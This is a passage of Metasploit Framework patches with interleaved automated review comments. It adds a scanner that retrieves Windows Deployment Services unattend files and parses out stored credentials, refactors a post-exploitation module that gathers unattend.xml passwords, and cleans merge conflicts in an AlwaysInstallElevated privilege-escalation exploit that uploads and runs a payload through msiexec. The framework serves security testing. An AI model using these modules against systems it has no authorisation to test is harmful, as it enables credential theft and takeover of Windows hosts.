Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) + end end raise 'make_bind failed' if !bind diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb index 463a8a8be755..34aa73de14c0 100644 --- a/lib/rex/proto/dcerpc/packet.rb +++ b/lib/rex/proto/dcerpc/packet.rb 
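Review bot: `self.parse` returns `nil` when the document has no `unattend` root (`return if unattend.nil?`) but an array otherwise, so a caller that iterates the result fails on any XML that is not an unattend file; `return [] if unattend.nil?` keeps the return type uniform. Each `gsub(/#{Rex::Text.to_unicode(...)}$/, '')` call anchors with `$`, which also matches before a newline inside the decoded value; `\z` anchors at the real end of the string. In the `DomainAccounts` branch the fallback for `group` is `rescue 'true'`, which looks copied from the `plaintext` lines and reports a group named "true" when the element is missing; `rescue ''` matches the other fields. It would also be worth a comment on the `plaintext == 'false'` branches stating that the stored value is only Base64-encoded with a fixed suffix, not encrypted, since that is the security-relevant fact for anyone reading the parsed results.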
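Review bot: The new branch in `bind` gives `self.handle.uuid` an undocumented second shape, and any length other than 4 (for example a three-element array) silently falls back to the two-argument call and drops the transfer syntax the caller supplied. I would document the convention above the branch, e.g. `# handle.uuid is [uuid, vers] or [uuid, vers, xfer_syntax_uuid, xfer_syntax_vers]`, and raise on any other length rather than guessing. Since `make_bind` gains default arguments in this same commit, `make_bind(*self.handle.uuid)` would express both cases in one line. `bind` starts and ends outside this hunk.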
@@ -11,11 +11,15 @@ class Packet UUID = Rex::Proto::DCERPC::UUID # Create a standard DCERPC BIND request packet - def self.make_bind(uuid, vers) + def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_syntax_vers=UUID.xfer_syntax_vers) # Process the version strings ("1.0", 1.0, "1", 1) bind_vers_maj, bind_vers_min = UUID.vers_to_nums(vers) - xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(UUID.xfer_syntax_vers) + xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(xfer_syntax_vers) + + if UUID.is? xfer_syntax_uuid + xfer_syntax_uuid = UUID.uuid_pack(xfer_syntax_uuid) + end # Create the bind request packet buff = @@ -37,7 +41,7 @@ def self.make_bind(uuid, vers) UUID.uuid_pack(uuid), # interface uuid bind_vers_maj, # interface major version bind_vers_min, # interface minor version - UUID.xfer_syntax_uuid, # transfer syntax + xfer_syntax_uuid, # transfer syntax xfer_vers_maj, # syntax major version xfer_vers_min, # syntax minor version ].pack('CCCCNvvVvvVVvvA16vvA16vv') diff --git a/lib/rex/proto/dcerpc/wdscp.rb b/lib/rex/proto/dcerpc/wdscp.rb new file mode 100644 index 000000000000..519f2ffb9071 --- /dev/null +++ b/lib/rex/proto/dcerpc/wdscp.rb @@ -0,0 +1,3 @@ +# -*- coding: binary -*- +require 'rex/proto/dcerpc/wdscp/constants' +require 'rex/proto/dcerpc/wdscp/packet' diff --git a/lib/rex/proto/dcerpc/wdscp/constants.rb b/lib/rex/proto/dcerpc/wdscp/constants.rb new file mode 100644 index 000000000000..1df1625a4ff2 --- /dev/null +++ b/lib/rex/proto/dcerpc/wdscp/constants.rb 
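Review bot: In `make_bind`, a value of `xfer_syntax_uuid` that fails `UUID.is?` is passed to `pack` unchanged, and the `A16` field in the format string will silently space-pad or truncate anything that is not exactly 16 bytes, producing a malformed bind request with no error. A guard after the conversion, `raise ArgumentError, 'invalid transfer syntax UUID' unless xfer_syntax_uuid.length == 16`, makes the failure visible at the call site. The default `UUID.xfer_syntax_uuid` is presumably already packed (the old code passed it to `pack` directly), so the guard should not affect existing callers. The method body continues outside both hunks in this file.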
@@ -0,0 +1,89 @@ +# -*- coding: binary -*- +module Rex +module Proto +module DCERPC +module WDSCP +# http://msdn.microsoft.com/en-us/library/dd891406(prot.20).aspx +# http://msdn.microsoft.com/en-us/library/dd541332(prot.20).aspx +# Not all values defined by the spec have been imported... +class Constants + WDSCP_RPC_UUID = "1A927394-352E-4553-AE3F-7CF4AAFCA620" + OS_DEPLOYMENT_GUID = "\x5a\xeb\xde\xd8\xfd\xef\xb2\x43\x99\xfc\x1a\x8a\x59\x21\xc2\x27" + + VAR_NAME_ARCHITECTURE = "ARCHITECTURE" + VAR_NAME_CLIENT_GUID = "CLIENT_GUID" + VAR_NAME_CLIENT_MAC = "CLIENT_MAC" + VAR_NAME_VERSION = "VERSION" + VAR_NAME_MESSAGE_TYPE = "MESSAGE_TYPE" + VAR_NAME_TRANSACTION_ID = "TRANSACTION_ID" + VAR_NAME_FLAGS = "FLAGS" + VAR_NAME_CC = "CC" #Client Capabilities + VAR_NAME_IMDC = "IMDC" + + VAR_TYPE_LOOKUP = { + VAR_NAME_ARCHITECTURE => :ULONG, + VAR_NAME_CLIENT_GUID => :WSTRING, + VAR_NAME_CLIENT_MAC => :WSTRING, + VAR_NAME_VERSION => :ULONG, + VAR_NAME_MESSAGE_TYPE => :ULONG, + VAR_NAME_TRANSACTION_ID => :WSTRING, + VAR_NAME_FLAGS => :ULONG, + VAR_NAME_CC => :ULONG, + VAR_NAME_IMDC => :ULONG + } + + CC_FLAGS = { + :V2 => 1, + :VHDX => 2 + } + + DOMAIN_JOIN_FLAGS = { + :JOIN_DOMAIN => 1, + :ACCOUNT_EXISTS => 2, + :PRESTAGE_USING_MAC => 3, + :RESET_BOOT_PROGRAM => 256 + } + + ARCHITECTURE = { + :X64 => 9, + :X86 => 0, + :IA64 => 6, + :ARM => 5 + } + + PACKET_TYPE = { + :REQUEST => 1, + :REPLY => 2 + } + + OPCODE = { + :IMG_ENUMERATE => 2, + :LOG_INIT => 3, + :LOG_MSG => 4, + :GET_CLIENT_UNATTEND => 5, + :GET_UNATTEND_VARIABLES => 6, + :GET_DOMAIN_JOIN_INFORMATION => 7, + :RESET_BOOT_PROGRAM => 8, + :GET_MACHINE_DRIVER_PACKAGES => 200 + } + + BASE_TYPE = { + :BYTE => 0x0001, + :USHORT => 0x0002, + :ULONG => 0x0004, + :ULONG64 => 0x0008, + :STRING => 0x0010, + :WSTRING => 0x0020, + :BLOB => 0x0040 + } + + TYPE_MODIFIER = { + :NONE => 0x0000, + :ARRAY => 0x1000 + } + +end +end +end +end +end 
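Review bot: None of the string or hash constants in `Constants` is frozen, so any caller can mutate `VAR_TYPE_LOOKUP`, `OPCODE` or `BASE_TYPE` in place and change how every later packet is serialized. Appending `.freeze` to each literal, e.g. `PACKET_TYPE = { :REQUEST => 1, :REPLY => 2 }.freeze`, prevents that. `Constants` only holds values, so `module Constants` would state the intent better than a class that can be instantiated. In `DOMAIN_JOIN_FLAGS`, `:PRESTAGE_USING_MAC => 3` is the only entry that is not a single bit, which may be worth confirming against the referenced MSDN pages.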
diff --git a/lib/rex/proto/dcerpc/wdscp/packet.rb b/lib/rex/proto/dcerpc/wdscp/packet.rb
new file mode 100644
index 000000000000..972f0ed2a4ef
--- /dev/null
+++ b/lib/rex/proto/dcerpc/wdscp/packet.rb
@@ -0,0 +1,74 @@ +# -*- coding: binary -*- +module Rex +module Proto +module DCERPC +module WDSCP +class Packet + + WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants + + def initialize(packet_type, opcode) + if opcode.nil? || packet_type.nil? + raise(ArgumentError, "Packet arguments cannot be nil") + end + + @variables = [] + @packet_type = WDS_CONST::PACKET_TYPE[packet_type] + @opcode = WDS_CONST::OPCODE[opcode] + end + + def add_var(name, type_mod=0, value_length=nil, array_size=0, value) + padding = 0 + value_type = WDS_CONST::BASE_TYPE[WDS_CONST::VAR_TYPE_LOOKUP[name]] + name = name.encode('UTF-16LE').unpack('H*')[0] + + value_length ||= value.length + + len = 16 * (1 + (value_length/16)) # Variable block total size should be evenly divisible by 16. + @variables << [name, padding, value_type, type_mod, value_length, array_size, value].pack('H132vvvVVa%i' % len) + end + + def create + packet = [] + var_count = @variables.count + + packet_size = 0 + @variables.each do |var| + packet_size += var.length + end + + packet_size += 16 # variables + operation + + # These bytes are not part of the spec but are not part of DCERPC according to Wireshark + # Perhaps something from MSRPC specific? Basically length of the WDSCP packet twice... + packet << [packet_size+40].pack('Q')*2 + packet << create_endpoint_header(packet_size) + packet << create_operation_header(packet_size, var_count, @packet_type, @opcode) + packet.concat(@variables) + + return packet.join + end + + def create_operation_header(packet_size, var_count, packet_type=:REQUEST, opcode) + return [ packet_size, # PacketSize + 256, # Version + packet_type, # Packet_Type + 0, # Padding + opcode, # Opcode + var_count, # Variable Count + ].pack('VvCCVV') + end + + def create_endpoint_header(packet_size) + return [ 40, # Header_Size + 256, # Version + packet_size, # Packet_Size - This doesn't differ from operation header despite the spec... 
+ WDS_CONST::OS_DEPLOYMENT_GUID, # GUID + "\x00"*16, # Reserved + ].pack('vvVa16a16') + end +end +end +end +end +end diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb new file mode 100644 index 000000000000..f973f09e4c26 --- /dev/null +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb 
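Review bot: `initialize` rejects nil arguments but not unknown ones: `WDS_CONST::PACKET_TYPE[packet_type]` and `WDS_CONST::OPCODE[opcode]` return nil for a symbol missing from the table, and the failure only appears later as a `TypeError` inside `pack` in `create_operation_header`. Using `@packet_type = WDS_CONST::PACKET_TYPE.fetch(packet_type)` and `@opcode = WDS_CONST::OPCODE.fetch(opcode)` raises a `KeyError` naming the bad key at construction time; the nested `VAR_TYPE_LOOKUP[name]` lookup in `add_var` has the same gap. The default `packet_type=:REQUEST` in `create_operation_header` is a symbol while the `C` directive needs an integer, so that default cannot work as written and is best dropped. `add_var` and `create_operation_header` also place optional parameters before a required one, which is legal but easy to misread; a short comment on the expected call forms would help.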
@@ -0,0 +1,221 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/proto/dcerpc' +require 'rex/proto/dcerpc/wdscp' +require 'rex/parser/unattend' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::DCERPC + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + DCERPCPacket = Rex::Proto::DCERPC::Packet + DCERPCClient = Rex::Proto::DCERPC::Client + DCERPCResponse = Rex::Proto::DCERPC::Response + DCERPCUUID = Rex::Proto::DCERPC::UUID + WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Retrieval', + 'Description' => %q{ + This module retrieves the client unattend file from Windows + Deployment Services RPC service and parses out the stored credentials. + Tested against Windows 2008 R2 + }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'Version' => '', + 'References' => + [ + [ 'MSDN', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'] + ], + )) + + register_options( + [ + Opt::RPORT(5040), + ], self.class) + + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + + register_advanced_options( + [ + OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false]) + ], self.class) + end + + def run_host(ip) + begin + query_host(ip) + rescue ::Interrupt + raise $! 
+ rescue ::Exception => e + print_error("#{ip}:#{rport} error: #{e}") + end + end + + def query_host(rhost) + # Create a handler with our UUID and Transfer Syntax + self.handle = Rex::Proto::DCERPC::Handle.new( + [ + WDS_CONST::WDSCP_RPC_UUID, + '1.0', + '71710533-beba-4937-8319-b5dbef9ccc36', + 1 + ], + 'ncacn_ip_tcp', + rhost, + [datastore['RPORT']] + ) + + print_status("Binding to #{handle} ...") + + self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock) + print_good("Bound to #{handle}") + + report_service( + :host => rhost, + :port => datastore['RPORT'], + :proto => 'tcp', + :name => "dcerpc", + :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services" + ) + + table = Rex::Ui::Text::Table.new({ + 'Header' => 'Windows Deployment Services', + 'Indent' => 1, + 'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password'] + }) + + creds_found = false + + WDS_CONST::ARCHITECTURE.each do |architecture| + if architecture[0] == :ARM && !datastore['ENUM_ARM'] + vprint_status "Skipping #{architecture[0]} architecture due to adv option" + next + end + + begin + result = request_client_unattend(architecture) + rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e + vprint_error(e.to_s) + print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.") + return + end + + unless result.nil? + loot_unattend(architecture[0], result) + results = parse_client_unattend(result) + + results.each do |result| + unless result.empty? + unless result['username'].nil? || result['password'].nil? 
+ print_good("Retrived #{result['type']} credentials for #{architecture[0]}") + creds_found = true + domain = "" + domain = result['domain'] if result['domain'] + report_creds(domain, result['username'], result['password']) + table << [architecture[0], result['type'], domain, result['username'], result['password']] + end + end + end + end + end + + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.") + end + end + + def request_client_unattend(architecture) + # Construct WDS Control Protocol Message + packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND) + packet.add_var( WDS_CONST::VAR_NAME_ARCHITECTURE, [architecture[1]].pack('C')) + packet.add_var( WDS_CONST::VAR_NAME_CLIENT_GUID, + "\x35\x00\x36\x00\x34\x00\x44\x00\x41\x00\x36\x00\x31\x00\x44\x00"\ + "\x32\x00\x41\x00\x45\x00\x31\x00\x41\x00\x41\x00\x42\x00\x32\x00"\ + "\x38\x00\x36\x00\x34\x00\x46\x00\x34\x00\x34\x00\x46\x00\x32\x00"\ + "\x38\x00\x32\x00\x46\x00\x30\x00\x34\x00\x33\x00\x34\x00\x30\x00"\ + "\x00\x00") + packet.add_var( WDS_CONST::VAR_NAME_CLIENT_MAC, + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x35\x00\x30\x00"\ + "\x35\x00\x36\x00\x33\x00\x35\x00\x31\x00\x41\x00\x37\x00\x35\x00"\ + "\x00\x00") + packet.add_var( WDS_CONST::VAR_NAME_VERSION,"\x00\x00\x00\x01\x00\x00\x00\x00") + wdsc_packet = packet.create + + print_status("Sending #{architecture[0]} Client Unattend request ...") + response = dcerpc.call(0, wdsc_packet) + + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + vprint_status('Received response ...') + data = dcerpc.last_response.stub_data + + # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000 + op_error_code = data.unpack('i*')[18] + if 
op_error_code == 0 + if data.length < 277 + vprint_error("No Unattend received for #{architecture[0]} architecture") + return nil + else + vprint_status("Received #{architecture[0]} unattend file ...") + return extract_unattend(data) + end + else + vprint_error("Error code received for #{architecture[0]}: #{op_error_code}") + return nil + end + end + end + + def extract_unattend(data) + start = data.index('')+10 + return data[start..finish] + end + + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) + + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end + + return Rex::Parser::Unattend.parse(xml).flatten + end + + def loot_unattend(archi, data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services") + print_status("Raw version of #{archi} saved as: #{p}") + end + + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 4050, + :sname => 'dcerpc', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end +end From 7a1ca528f25c6011d5241244e98bbd62bef9ac5d Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2012 10:53:29 +0000 Subject: [PATCH 004/421] Revert always_install_elevated file to upstream --- .../windows/local/always_install_elevated.rb | 98 ------------------- 1 file changed, 98 deletions(-) diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 24fd83f47e6d..afad7c94657e 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb 
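Review bot: In `parse_client_unattend` the `rescue REXML::ParseException` branch only prints a message, so `xml` is nil when control reaches `Rex::Parser::Unattend.parse(xml).flatten`; the parser is outside this hunk, but it presumably dereferences the document, and the resulting exception is then reported by `run_host` as a generic error. Adding `return []` at the end of the rescue branch lets the loop in `query_host` continue with the remaining architectures. `run_host` rescues `::Exception`, which also swallows `NoMemoryError` and `SystemExit`; `rescue ::StandardError => e` is the narrower form. `report_creds` records `:port => 4050` although the option registered above is `Opt::RPORT(5040)`, so stored findings point at the wrong port; `:port => rport` avoids the literal.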
@@ -18,27 +18,12 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Registry -<<<<<<< HEAD -======= include Msf::Exploit::FileDropper ->>>>>>> upstream/master def initialize(info={}) super(update_info(info, { 'Name' => 'Windows AlwaysInstallElevated MSI', 'Description' => %q{ -<<<<<<< HEAD - This module checks the AlwaysInstallElevated registry keys which - dictate if .MSI files should be installed with elevated privileges - (NT AUTHORITY\SYSTEM). - - The default MSI file is data/exploits/exec_payload.msi with the WiX source - file under external/source/exploits/exec_payload_msi/exec_payload.wxs. - This MSI simply executes payload.exe within the same folder. - - The MSI may not execute succesfully successive times, but may be able to - get around this by regenerating the MSI. -======= This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). @@ -48,7 +33,6 @@ def initialize(info={}) The MSI may not execute succesfully successive times, but may be able to get around this by regenerating the MSI. ->>>>>>> upstream/master MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs 
@@ -106,39 +90,6 @@ def check else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) -<<<<<<< HEAD - - if current_user_value.nil? - print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") - return Msf::Exploit::CheckCode::Safe - elsif current_user_value == 0 - print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") - return Msf::Exploit::CheckCode::Safe - else - print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") - return Msf::Exploit::CheckCode::Vulnerable - end - end - end - - def cleanup - if @executed - begin - print_status("Deleting MSI...") - file_rm(@msi_destination) - rescue Rex::Post::Meterpreter::RequestError => e - print_error(e.to_s) - print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.") - end - - begin - print_status("Deleting Payload...") - file_rm(@payload_destination) - rescue Rex::Post::Meterpreter::RequestError => e - print_error(e.to_s) - print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.") - end -======= end if current_user_value.nil? 
@@ -150,58 +101,10 @@ def cleanup else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable ->>>>>>> upstream/master end end def exploit -<<<<<<< HEAD - @executed = false - if check == Msf::Exploit::CheckCode::Vulnerable - @executed = true - - msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" - msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi") - - # Upload MSI - @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped - print_status("Uploading the MSI to #{@msi_destination} ...") - - #upload_file - ::File.read doesn't appear to work in windows... - source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) } - write_file(@msi_destination, source) - - # Upload payload - payload = generate_payload_exe - @payload_destination = expand_path("%TEMP%\\payload.exe").strip - print_status("Uploading the Payload to #{@payload_destination} ...") - write_file(@payload_destination, payload) - - # Execute MSI - print_status("Executing MSI...") - - if datastore['LOG_FILE'].nil? - logging = "" - else - logging = "/l* #{datastore['LOG_FILE']} " - end - - if datastore['QUIET'] - quiet = "/quiet " - else - quiet = "" - end - - cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}" - vprint_status("Executing: #{cmd}") - begin - result = cmd_exec(cmd) - rescue Rex::TimeoutError - vprint_status("Execution timed out.") - end - vprint_status("MSI command-line feedback: #{result}") - end -======= if check != Msf::Exploit::CheckCode::Vulnerable return @@ -249,6 +152,5 @@ def exploit vprint_status("Execution timed out.") end vprint_status("MSI command-line feedback: #{result}") ->>>>>>> upstream/master end end From 6dd617422113dc0750b88b604896a8f0adefc421 Mon Sep 17 00:00:00 2001 
From: Meatballs1 Date: Thu, 13 Dec 2012 10:58:05 +0000 Subject: [PATCH 005/421] Migrate enum_unattend to unattend parser lib --- modules/post/windows/gather/enum_unattend.rb | 221 +++++-------------- 1 file changed, 60 insertions(+), 161 deletions(-) diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 8fcf768d1627..baa33094ccdf 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,6 +7,7 @@ require 'msf/core' require 'msf/core/post/file' +require 'rex/parser/unattend' require 'rexml/document' class Metasploit3 < Msf::Post @@ -45,7 +46,7 @@ def initialize(info={}) # - # Determie if unattend.xml exists or not + # Determine if unattend.xml exists or not # def unattend_exists?(xml_path) x = session.fs.file.stat(xml_path) rescue nil 
@@ -75,152 +76,6 @@ def load_unattend(xml_path) return xml, raw end - - # - # Extract sensitive data from UserAccounts - # - def extract_useraccounts(user_accounts) - return[] if user_accounts.nil? - - cred_tables = [] - account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts'] - account_types.each do |t| - element = user_accounts.elements[t] - next if element.nil? - - case t - # - # Extract the password from AdministratorPasswords - # - when account_types[0] - table = Rex::Ui::Text::Table.new({ - 'Header' => 'AdministratorPasswords', - 'Indent' => 1, - 'Columns' => ['Username', 'Password'] - }) - - password = element.elements['Value'].get_text.value rescue '' - plaintext = element.elements['PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '') - end - - if not password.empty? - table << ['Administrator', password] - cred_tables << table - end - - # - # Extract the sensitive data from DomainAccounts. - # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts - # - when account_types[1] #DomainAccounts - table = Rex::Ui::Text::Table.new({ - 'Header' => 'DomainAccounts', - 'Indent' => 1, - 'Columns' => ['Username', 'Group'] - }) - - element.elements.each do |account_list| - name = account_list.elements['DomainAccount/Name'].get_text.value rescue '' - group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true' - - table << [name, group] - end - - cred_tables << table if not table.rows.empty? 
- - # - # Extract the username/password from LocalAccounts - # - when account_types[2] #LocalAccounts - table = Rex::Ui::Text::Table.new({ - 'Header' => 'LocalAccounts', - 'Indent' => 1, - 'Columns' => ['Username', 'Password'] - }) - - element.elements.each do |local| - password = local.elements['Password/Value'].get_text.value rescue '' - plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - username = local.elements['Name'].get_text.value rescue '' - table << [username, password] - end - - cred_tables << table if not table.rows.empty? - end - end - - return cred_tables - end - - - # - # Extract sensitive data from AutoLogon - # - def extract_autologon(auto_logon) - return [] if auto_logon.nil? - - domain = auto_logon.elements['Domain'].get_text.value rescue '' - username = auto_logon.elements['Username'].get_text.value rescue '' - password = auto_logon.elements['Password/Value'].get_text.value rescue '' - plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'AutoLogon', - 'Indent' => 1, - 'Columns' => ['Domain', 'Username', 'Password'] - }) - - table << [domain, username, password] - - return [table] - end - - - # - # Extract sensitive data from Deployment Services. - # We can only seem to add one with Windows System Image Manager, so - # we'll only enum one. - # - def extract_deployment(deployment) - return [] if deployment.nil? 
- - domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue '' - username = deployment.elements['Login/Credentials/Username'].get_text.value rescue '' - password = deployment.elements['Login/Credentials/Password'].get_text.value rescue '' - plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'WindowsDeploymentServices', - 'Indent' => 1, - 'Columns' => ['Domain', 'Username', 'Password'] - }) - - table << [domain, username, password] - - return [table] - end - - # # Save Rex tables separately # @@ -309,20 +164,8 @@ def run # XML failed to parse, will not go on from here return if not xml - # Extract the credentials - tables = [] - unattend = xml.elements['unattend'] - return if unattend.nil? - - unattend.each_element do |settings| - next if settings.class != REXML::Element - settings.get_elements('component').each do |c| - next if c.class != REXML::Element - tables << extract_useraccounts(c.elements['UserAccounts']) - tables << extract_autologon(c.elements['AutoLogon']) - tables << extract_deployment(c.elements['WindowsDeploymentServices']) - end - end + results = Rex::Parser::Unattend.parse(xml) + tables = create_display_tables(results) # Save the data save_cred_tables(tables.flatten) if not tables.empty? 
@@ -330,4 +173,60 @@ def run return if not datastore['GETALL'] end end + + def create_display_tables(results) + tables = [] + wds_table = Rex::Ui::Text::Table.new({ + 'Header' => 'WindowsDeploymentServices', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + autologin_table = Rex::Ui::Text::Table.new({ + 'Header' => 'AutoLogon', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + admin_table = Rex::Ui::Text::Table.new({ + 'Header' => 'AdministratorPasswords', + 'Indent' => 1, + 'Columns' => ['Username', 'Password'] + }) + + domain_table = Rex::Ui::Text::Table.new({ + 'Header' => 'DomainAccounts', + 'Indent' => 1, + 'Columns' => ['Username', 'Group'] + }) + + local_table = Rex::Ui::Text::Table.new({ + 'Header' => 'LocalAccounts', + 'Indent' => 1, + 'Columns' => ['Username', 'Password'] + }) + results.each do |result| + unless result.empty? + case result['type'] + when 'wds' + wds_table << [result['domain'], result['username'], result['password']] + when 'auto' + autologin_table << [result['domain'], result['username'], result['password']] + when 'admin' + admin_table << [result['username'], result['password']] + when 'domain' + domain_table << [result['username'], result['group']] + when 'local' + local_table << [result['username'], result['password']] + end + end + end + + tables << autologin_table + tables << admin_table + tables << domain_table + tables << local_table + + return tables + end end From 3127808f76f20e8d8debca5233bb669d85cb89a2 Mon Sep 17 00:00:00 2001 
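Review bot: `create_display_tables` fills `wds_table` in the `when 'wds'` branch but never appends it to `tables`, so WindowsDeploymentServices entries returned by the parser are dropped from the saved output; `tables << wds_table` is missing before the other four appends. The method also appends every table whether or not it has rows, unlike the removed code that used `cred_tables << table if not table.rows.empty?`, which makes the `if not tables.empty?` guard in the preceding `run` hunk always true. Appending conditionally, e.g. `tables << local_table unless local_table.rows.empty?`, restores the earlier behaviour. The new method has no header comment; one line stating that it maps the parser's result hashes (keyed by `'type'`) onto one table per account type would match the `#` comment blocks used for the other methods in this file.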
From: Meatballs1 Date: Thu, 13 Dec 2012 11:02:54 +0000 Subject: [PATCH 006/421] Revert/remove unnecessary files --- lib/rex/proto/dcerpc/client.rb | 9 +- lib/rex/proto/dcerpc/packet.rb | 10 +- lib/rex/proto/dcerpc/wdscp.rb | 3 - lib/rex/proto/dcerpc/wdscp/constants.rb | 89 ------- lib/rex/proto/dcerpc/wdscp/packet.rb | 74 ------ .../dcerpc/windows_deployment_services.rb | 221 ------------------ 6 files changed, 4 insertions(+), 402 deletions(-) delete mode 100644 lib/rex/proto/dcerpc/wdscp.rb delete mode 100644 lib/rex/proto/dcerpc/wdscp/constants.rb delete mode 100644 lib/rex/proto/dcerpc/wdscp/packet.rb delete mode 100644 modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index c4aaaa6f3acb..928e5eb4bfc2 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -252,14 +252,7 @@ def bind() bind, context = Rex::Proto::DCERPC::Packet.make_bind_fake_multi(*args) else - if self.handle.uuid.length == 4 - bind, context = Rex::Proto::DCERPC::Packet.make_bind( self.handle.uuid[0], - self.handle.uuid[1], - self.handle.uuid[2], - self.handle.uuid[3]) - else - bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) - end + bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) end raise 'make_bind failed' if !bind diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb index 34aa73de14c0..463a8a8be755 100644 --- a/lib/rex/proto/dcerpc/packet.rb +++ b/lib/rex/proto/dcerpc/packet.rb 
